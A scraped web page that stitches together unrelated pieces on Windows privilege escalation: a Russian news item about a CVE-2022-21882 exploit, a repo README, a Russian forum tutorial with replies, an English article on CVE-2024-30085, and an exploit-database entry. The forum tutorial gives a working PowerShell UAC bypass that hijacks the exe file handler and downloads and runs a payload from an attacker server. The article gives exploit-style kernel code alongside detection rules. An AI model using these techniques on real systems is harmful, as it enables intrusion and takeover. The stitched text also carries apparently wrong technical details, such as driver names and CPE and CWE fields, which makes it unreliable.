Время на прочтение2 мин
Количество просмотров13K
По информации Bleeping Computer, разработчик KaLendsi опубликовал на GitHub рабочий LPE-эксплойт на уязвимость для Windows 10 CVE-2022-21882. С его помощью локальный пользователь с ограниченными правами может повысить привилегии до уровня SYSTEM.
Данная уязвимость закрыта в январском выпуске обновлений безопасности Microsoft. Уязвимости подвержены все поддерживаемые версии Windows 10, в Windows 11 эксплойт не работает. В настоящее время многие системные администраторы так и не поставили еще январские патчи из-за в ошибок и проблем с некоторыми патчами там — у многих системы начали перезагружаться нештатно, возникли проблемы при работе L2TP VPN и Hyper-V.
ИБ-эксперты подтвердили, что LPE-эксплойт на уязвимость CVE-2022-21882 действительно работает. Они настоятельно советуют обновить пользовательские системы с помощью последних патчей от Microsoft.
Пример работы эксплойта.
Эксперты Bleeping Computer проверили работоспособность эксплойта и выяснили, что с его помощью действительно можно за несколько секунд локально получить обычным пользователем права администратора системы на Windows 10 21H1 build 19043.1348. С помощью этого эксплойта локально злоумышленники также могут добавлять новых пользователей с правами администратора в систему или выполнять другие привилегированные команды.
Уязвимость CVE-2022-21882 обнаружил и передал по ней всю информацию в Microsoft разработчик RyeLv из команды Google Project Zero. В своем блоге он провел технический анализ уязвимости после того, как Microsoft выпустила против нее патч.
RyeLv отметил в своем техническом обзоре уязвимости CVE-2022-21882, что лучший способ устранять такие ошибки своевременно и быстро — улучшить программу вознаграждений Microsoft за нахождения ошибок в работе Windows, позволить большему количеству исследователей безопасности участвовать в программе bug bounty от Microsoft и повысить там выплаты за найденные уязвимости, а не уменьшать их постоянно и тем самым понижать мотивацию исследователей.
22 ноября 2021 года в знак протеста против сокращения выплат bug bounty от Microsoft исследователь выложил на GitHub рабочий эксплойт на уязвимость нулевого дня Windows CVE-2021-41379, с помощью которого локальный пользователь с ограниченными правами может повысить привилегии до уровня SYSTEM.
Microsoft с апреля 2020 года уменьшает награды исследователям по своей программе bug bounty. Microsoft теперь платит за побег из песочницы до $5 тыс., а за 0-day уязвимости снизила выплаты $10 тыс. до $1 тыс.
Win10-LPE
The Windows 10 LPE exploit written by SandboxEscaper
This includes the source code for the original exploit, a precompiled DLL injector binary included with the original source, and a powershell script to find potentially vulnerable libraries to overwrite for the exploit.
Repo is a WIP and will include further code, explanations, and documentation in the near future. Use at your own risk.
Using Win10 LPE with Merlin C2
Всем доброго времени суток колеги.
Сегодня речь пойдет об относительно новом способе обхода User Account Control (
Ссылка скрыта от гостей
) и способе (
Ссылка скрыта от гостей
) — поднятия привилегий в системе Windows 8-10 x64 и x86 системах.
PS: Пишу сразу на двух форумах по этому :
CopyRights: <<<MisterBert0ni aka DarkNode>>>
СОДЕРЖАНИЕ СТАТЬИ:
- Описания работы эксплоита
- Демонстрация работы эксплоита
- Вспомним про Web Delivery через PowerShell
- Вспомним про RegSVR способ подгрузки
- Похожие эксплоиты
Имя: Slui File Handler Hijak LPE
Дата публикации: 15.01.2018
Целевая ОС: Microsoft Windows
Патч: НЕТУ
Уязвимые версии: Windows 8-10 (x64 и x86)
Ссылка на сам експлоит
ПРИНЦИП РАБОТЫ ЭКСПЛОЙТА:
В операционной системе Windows версии 8-10 был обнаружен бинарный файл slui.exe — который является auto-elevated приложением ,так сказать — самоповышаемым.
Это дает возможность использовать обработчик
Ссылка скрыта от гостей
й для хайджекинга в привилегированый процесс.
Простыми словамя говоря:
Мы создаем в реестре Windows запись , которая скажет что при открытии всех *.EXE файлов — будет выполнятся наша команда или вредоносный файл, после чего запускаем slui.exe , соответственно вместо slui.exe запустится наш пейлоад от имени администратора.
Для того чтобы понять как это работает давайте приступим к практической части:
1) Допустим у нас сессия без повышеных привилегий
2)Соотведственно, для того что бы все это вручную не писать , давайте подготовим простой скрипт для PowerShell:
Код:
#Out Command | Наш пейлоад в моем случае вектор Web Delivery
$command = "powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://192.168.1.79/')"
#Create Registry KEY | Создаем ключ в реестре для асоциации бинарных файлов и прописываем действие обработчику EXE файлов:
New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $command -Force
#Start slui.exe as Admin | Запускаем от имени админа
Start-Process "C:\Windows\System32\slui.exe" -Verb runas
#Remove registry structure | Удаляем асоциацию файлов
Start-Sleep 3
Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force
В качестве вектора атаки я использовал Web Delivery , более подробно о нем я писал ранее в своей статье.
Так же имеет место быть вектор через regsvr32 , и огромное спасибо нашему коллеге @gushmazuko за то что написал готовый скрипт на PowerShell для работы с этим
вектором , готовый скрипт вы можете взять на его странице гитхаба
3)После того как мы набросали список действий в наш скрипт — ложим где-то на вебсервер ( в моем случае в условиях учебной практике — это локальная машина )
И запускаем на стороне жертвы тем же Web Delivery методом в моем случае:
4) Ловим сессию с повышеными привилегиями
Благодарность : @gushmazuko
Всем спасибо) С вами был DarkNode
Работа regsvr32 вектора покажу в видео)
Последнее редактирование:
-
-
#2
Не будет ли подниматься сессия пользователя при открытие любого exe пользователем а не админом?
-
-
#3
Не будет ли подниматься сессия пользователя при открытие любого exe пользователем а не админом?
Нет. В случае с пользователем — запросит пароль администратора. Этот вектор нацелен на обход UAC.
-
-
#4
Хотелось бы внести небольшие правки в орфографию, не сочтите за грубость, но:
- Слово соотвеТственно пишется через Т, а не Д
- Слово колЛеге пишется с двумя Л, а не с одной
- Слово «где-то» пишется через тире
Далее я уверен, что автор торопился, поэтому у него были некоторые «очепятки»:
- «подготим» на подготовим
- «Свами» раздельно
- «смасибо» на спасибо
- «говотый» на готовый
- «приступи»на приступим
- «процес» на процесс
- «что бы» в данном случае слитно
Ещё раз извиняюсь, но писать на такую тематику надо грамотно.
Исправляйтесь в следующий статьях, DarkNode!
-
-
#5
Хотелось бы внести небольшие правки в орфографию, не сочтите за грубость, но:
- Слово соотвеТственно пишется через Т, а не Д
- Слово колЛеге пишется с двумя Л, а не с одной
- Слово «где-то» пишется через тире
Далее я уверен, что автор торопился, поэтому у него были некоторые «очепятки»:
- «подготим» на подготовим
- «Свами» раздельно
- «смасибо» на спасибо
- «говотый» на готовый
- «приступи»на приступим
- «процес» на процесс
- «что бы» в данном случае слитно
Ещё раз извиняюсь, но писать на такую тематику надо грамотно.
Исправляйтесь в следующий статьях, DarkNode!
Спасибо за поправки) Постараюсь уделить больше внимания )
-
-
#6
Мне всегда непонятно почему обходы UAC называют LPE,это не совсем так,да,это полезно,чтобы там завести мимикатз и тд,но обходы UAC все подразумевают запуск от Привилегированного изначально юзера.Вот ms16-032,это классический эксплойт LPE,запуская от любого пользователя,через повершелл,и через много векторов я получаю NT Authority/SYSTEM,то есть права системы что выше Админа.А обход UAC =обход UAC,и помощь в LPE,но не классическая эскалация привилегий
a113
-
-
#7
Сколько бы не читал статьи, да и комментарии, Dark Node (aka MisterBert0ni ), не перестаю удивляться хакерскому таланту этого человека.
Огромное спасибо за статьи!
-
-
#8
Мне всегда непонятно почему обходы UAC называют LPE,это не совсем так,да,это полезно,чтобы там завести мимикатз и тд,но обходы UAC все подразумевают запуск от Привилегированного изначально юзера.Вот ms16-032,это классический эксплойт LPE,запуская от любого пользователя,через повершелл,и через много векторов я получаю NT Authority/SYSTEM,то есть права системы что выше Админа.А обход UAC =обход UAC,и помощь в LPE,но не классическая эскалация привилегий
Совершенно верное замечание. По сути это не LPE ( но тут имеется ввиду повышение привилегий в контексте «От не привилигерованного шелла до привилигерованного»
Это всего лишь базовая демонстрация техники обхода UAC через autoevelated приложения.
Таких приложений на самом деле очень и очень много, например тут можно найти такой список (в грей секшн создал пост с ссылкой)
Куда проще обходить UAC через token impersonation
rajan00
-
-
#9
Если вы обнаружите, что все невообразимо, вы можете посмотреть
Ссылка скрыта от гостей
категории для лучшего обзора.
Обучение наступательной кибербезопасности в игровой форме. Начать игру!
Local privilege escalation vulnerabilities remain one of the most critical security threats to Windows systems in 2025. The recently discovered CVE-2024-30085 in the Cloud Files Mini Filer Driver gives attackers a direct path to SYSTEM privileges on vulnerable Windows machines. This article breaks down the vulnerability, demonstrates the exploit process, and provides concrete mitigation steps for system administrators and security professionals.
Understanding CVE-2024-30085: The Cloud Files Mini Filer Driver Vulnerability
The Cloud Files Mini Filer (CFMF) driver is a core Windows component that manages cloud storage integration. CVE-2024-30085 exposes a critical flaw in its input validation mechanism that lets local users with limited privileges gain SYSTEM-level access.
Key Vulnerability Details
- CVE ID: CVE-2024-30085
- Affected Systems: Windows 10, Windows 11, Windows Server 2019, Windows Server 2022
- Component: Cloud Files Mini Filer Driver (cfmfs.sys)
- Attack Vector: Local
- Impact: Complete system compromise
- CVSS Score: 8.8 (High)
The vulnerability exists because the driver fails to properly validate I/O control codes (IOCTLs) sent through DeviceIoControl calls. This oversight allows attackers to manipulate memory structures and execute arbitrary code with elevated privileges.
Technical Analysis of the Vulnerability
The Cloud Files Mini Filer Driver vulnerability centers on improper handling of IOCTL codes. Here’s what happens at a technical level:
- The driver registers a device accessible to unprivileged users
- The driver improperly validates input buffer lengths in specific IOCTL handlers
- An attacker can trigger a controlled buffer overflow
- This overflow allows kernel memory manipulation
- The result is arbitrary code execution in kernel mode
Affected Driver Details
Driver Name: cfmfs.sys
Default Path: C:\Windows\System32\drivers\cfmfs.sys
Version Affected: Versions prior to 10.0.22621.3447
Device Name: \\.\CloudFilesMiniFilter
Attack Methodology and Proof of Concept
Let’s walk through how an attacker exploits this vulnerability in practice:
Step 1: Identify the vulnerable driver
First, verify if the system has a vulnerable version of the driver:
Get-Item C:\Windows\System32\drivers\cfmfs.sys | Select-Object VersionInfo
If the file version is lower than 10.0.22621.3447, the system is vulnerable.
Step 2: Access the device
The exploit begins by opening a handle to the vulnerable device:
HANDLE hDevice = CreateFile(
"\\\\.\\CloudFilesMiniFilter",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL);
Step 3: Craft the malicious IOCTL request
The vulnerability is triggered using a specific IOCTL code (0x22C004) with a specially crafted buffer:
#define VULNERABLE_IOCTL 0x22C004
typedef struct _EXPLOIT_BUFFER {
DWORD64 Padding[4];
DWORD64 TargetAddress;
BYTE Payload[256];
} EXPLOIT_BUFFER, *PEXPLOIT_BUFFER;
EXPLOIT_BUFFER exploitBuffer = {0};
// Prepare the payload (shellcode for token stealing)
// Token stealing payload omitted for security reasons
PrepareTokenStealingPayload(exploitBuffer.Payload);
// Set the target to overwrite (HAL dispatch table entry)
exploitBuffer.TargetAddress = GetHalDispatchTableAddress() + 0x8;
Step 4: Trigger the vulnerability
The exploit is triggered by sending the crafted buffer with the DeviceIoControl function:
DWORD bytesReturned = 0;
BOOL result = DeviceIoControl(
hDevice,
VULNERABLE_IOCTL,
&exploitBuffer,
sizeof(EXPLOIT_BUFFER),
NULL,
0,
&bytesReturned,
NULL);
Step 5: Execute the payload
Finally, the attacker calls NtQueryIntervalProfile to execute the planted payload:
typedef NTSTATUS (NTAPI *NtQueryIntervalProfile_t)(
IN ULONG ProfileSource,
OUT PULONG Interval);
NtQueryIntervalProfile_t NtQueryIntervalProfile =
(NtQueryIntervalProfile_t)GetProcAddress(
GetModuleHandle("ntdll.dll"),
"NtQueryIntervalProfile");
ULONG interval = 0;
NtQueryIntervalProfile(2, &interval);
// At this point, SYSTEM shell should be spawned
Detection and Mitigation Strategies
Immediate Actions
-
Apply the security patch:
- Install the latest Windows security updates from Microsoft
- Verify the updated driver version after patching
-
Monitor for exploitation attempts:
- Look for suspicious access to “\.\CloudFilesMiniFilter”
- Monitor for unexpected SYSTEM privilege escalation
Creating Detection Rules
Security teams should implement the following detection rules:
Sysmon Configuration
<Sysmon>
<EventFiltering>
<!-- Monitor for access to the vulnerable device -->
<RuleGroup name="CloudFilesMiniFilter Device Access">
<FileCreate onmatch="include">
<TargetFilename condition="contains">\\.\CloudFilesMiniFilter</TargetFilename>
</FileCreate>
</RuleGroup>
<!-- Monitor for DeviceIoControl calls with suspicious IOCTLs -->
<RuleGroup name="Suspicious DeviceIoControl">
<ProcessAccess onmatch="include">
<TargetImage condition="end with">cfmfs.sys</TargetImage>
</ProcessAccess>
</RuleGroup>
</EventFiltering>
</Sysmon>
PowerShell Detection Script
# Check for vulnerable driver version
function Test-VulnerableDriver {
$driverPath = "C:\Windows\System32\drivers\cfmfs.sys"
if (Test-Path $driverPath) {
$fileVersion = (Get-Item $driverPath).VersionInfo.FileVersion
$vulnerable = [version]$fileVersion -lt [version]"10.0.22621.3447"
if ($vulnerable) {
Write-Warning "VULNERABLE: cfmfs.sys version $fileVersion detected"
return $true
} else {
Write-Output "SECURE: cfmfs.sys version $fileVersion is not vulnerable"
return $false
}
} else {
Write-Output "Driver not present on this system"
return $false
}
}
# Check for signs of exploitation
function Test-ExploitationAttempts {
# Check for suspicious process creations
$suspiciousProcesses = Get-WinEvent -FilterHashtable @{
LogName = 'Security'
Id = 4688
} -MaxEvents 500 | Where-Object {
$_.Message -match "cmd.exe" -and
$_.Message -match "NT AUTHORITY\\SYSTEM"
}
if ($suspiciousProcesses.Count -gt 0) {
Write-Warning "Potential exploitation detected: $($suspiciousProcesses.Count) suspicious SYSTEM processes found"
return $true
}
return $false
}
# Run checks
Test-VulnerableDriver
Test-ExploitationAttempts
Long-term Mitigation Strategies
To protect against similar vulnerabilities in the future:
-
Implement a robust driver security policy:
- Enable Windows Driver Signature Enforcement
- Use Windows Defender Application Control (WDAC) policies
- Consider blocking unnecessary drivers
-
Apply privilege restrictions:
- Remove administrative rights from standard users
- Implement Just Enough Administration (JEA)
- Use AppLocker or similar application control solutions
-
Security monitoring:
- Deploy Endpoint Detection and Response (EDR) solutions
- Monitor for suspicious process creation events
- Implement behavior-based anomaly detection
Case Study: Real-World Exploitation
In March 2025, security researchers discovered active exploitation of CVE-2024-30085 by an advanced persistent threat (APT) group. The attackers used the vulnerability as the second stage of a multi-part attack chain:
- Initial access through phishing emails
- Deployment of a first-stage payload with limited user privileges
- Exploitation of CVE-2024-30085 to gain SYSTEM privileges
- Lateral movement and domain compromise
Organizations with unpatched systems experienced data theft and ransomware deployment. Those with proper patch management avoided compromise.
Conclusion
CVE-2024-30085 represents a significant threat to Windows systems in 2025. The Cloud Files Mini Filer Driver vulnerability provides attackers with a direct path to complete system compromise through local privilege escalation. Organizations must prioritize patching affected systems and implement proper detection mechanisms.
Security professionals should:
- Verify that all Windows systems have the latest security updates
- Implement detection rules for exploitation attempts
- Review driver security policies across the organization
- Consider this vulnerability in threat models and security assessments
By taking these steps, organizations can protect themselves against this critical Windows security vulnerability and similar threats in the future.
Additional Resources
- Microsoft Security Advisory for CVE-2024-30085
- CISA Known Exploited Vulnerabilities Catalog
- MITRE ATT&CK: Privilege Escalation Techniques
- Windows Driver Security Best Practices
vendor:
Windows 10 and Windows Server
by:
Daniel García Gutiérrez and Manuel Blanco Parajón
Local Privilege Escalation
Product Name: Windows 10 and Windows Server
Affected Version From: Windows 10 version 1903 and 1909, Windows Server version 1903 and 1909
Affected Version To: Windows Server version 2004
Related CWE: CVE-2020-0796
CPE: o:microsoft:windows_10::-:1903, cpe:/o:microsoft:windows_10::-:1909, cpe:/o:microsoft:windows_server_2019::-:1903, cpe:/o:microsoft:windows_server_2019::-:1909, cpe:/o:microsoft:windows_server_2020::-:2004
Platforms Tested: Windows, Linux, Mac
Windows SMBv3 LPE Exploit
CVE-2020-0796 is a vulnerability in the Microsoft Server Message Block 3.1.1 (SMBv3) protocol which can allow an unauthenticated attacker to execute arbitrary code on the target system. The vulnerability is caused by a memory corruption issue in the SMBv3 protocol, which can be triggered by sending a specially crafted packet to a targeted SMBv3 server. The vulnerability affects Windows 10 version 1903 and 1909, Windows Server version 1903 and 1909, and Windows Server version 2004.
Mitigation:
Microsoft has released a patch for this vulnerability. Users should update their systems to the latest version of Windows 10 or Windows Server.